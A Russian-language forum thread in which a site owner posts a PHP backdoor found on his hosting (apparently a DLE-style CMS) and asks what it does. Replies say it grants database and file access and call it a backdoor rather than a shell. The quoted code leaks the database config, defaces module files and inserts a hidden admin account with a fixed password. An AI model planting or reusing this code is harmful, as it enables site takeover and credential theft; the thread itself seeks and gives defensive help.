Помощник
|
Shell |
fedek
|
Сообщение
#1
|
||
|
|
||
|
|||
777374 |
31.5.2010, 17:24;
Ответить: 777374
Сообщение
#2
|
|
Есть файл, в котором Находится как я понимаю Shell } if($_GET['abc']){ $ko = ' if ($_GET[\'abc\']) {echo file_get_contents(\'data/dbconfig.php\');} if ($_GET[\'drop\']) {$fp = fopen(\'modules/domain_check2.php\',\'w\'); fwrite($fp,\'<? echo"<h1>FUCK YOU</h1>"; ?>\'); fclose($fp); $fp = fopen(\'modules/domain_check.php\',\'w\'); fwrite($fp,\'<? echo"<h1>FUCK YOU</h1>"; ?>\'); fclose($fp);} if ($_GET[\'sql\']) {$db->query( "INSERT INTO " . PREFIX . "_users (email, password, name, user_group) VALUES (\'admin@admin.ru\', \'".md5(\'000000\')."\', \'Support\', \'1\')" );} '; $sf = str_replace('<?php',"<?\n".$ko,file_get_contents(ENGINE_DIR.'/download.php')); $fp = fopen(ENGINE_DIR.'/download.php','w'); fwrite($fp,$sf); fclose($fp); } С помощью него человек получает доступ к этому фалу или ко всем данным у меня на хостинге? И если стереть эту часть кода, закроется ли доступ данному человеку к данному файлу и хостингу? P.S. отвечать строго по теме, не кого не обсуждая! этот код делает листинг data/dbconfig.php... etc.. кароч админа ставит в бд mysql -------------------- |
|
|
fedek
|
Сообщение
#3
|
|
этот код делает листинг data/dbconfig.php... etc.. кароч админа ставит в бд mysql С помощью этого кода кто-то может получить доступ к моим данным(хостингу, БД, К данному файлу)? -------------------- |
|
|
777374 |
31.5.2010, 17:30;
Ответить: 777374
Сообщение
#4
|
|
С помощью этого кода кто-то может получить доступ к моим данным(хостингу, БД, К данному файлу)? DB Only! и некоторым файлам -------------------- |
|
|
fedek
|
Сообщение
#5
|
|
DB Only! и некоторым файлам Тоесть если я сотру данный код, то злоумышленник не получит доступ к данному файлу и базе данных? -------------------- |
|
|
Electric |
31.5.2010, 19:37;
Ответить: Electric
Сообщение
#6
|
|
Тоесть если я сотру данный код, то злоумышленник не получит доступ к данному файлу и базе данных? Да, но не фак что уже не получили доступ. Кстати это не шелл это бекдор.Одного не пойму, зачем плодить темы? http://talk.maulnet.ru/index.php?showtopic=56429 -------------------- |
|
|
fedek
|
Сообщение
#7
|
|
|
Одного не пойму, зачем плодить темы? Инет лагнул видимо... Можете посмотреть, темы в одно и тоже время созданы...
-------------------- |
|
|
||
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Фотография DF Perl Informer - бесплатный скрипт для тестирования хостинга, web-shell | 0 | DFService | 1286 | 7.7.2020, 14:30 автор: DFService |
Текстовая версия | Сейчас: 29.3.2024, 0:53 |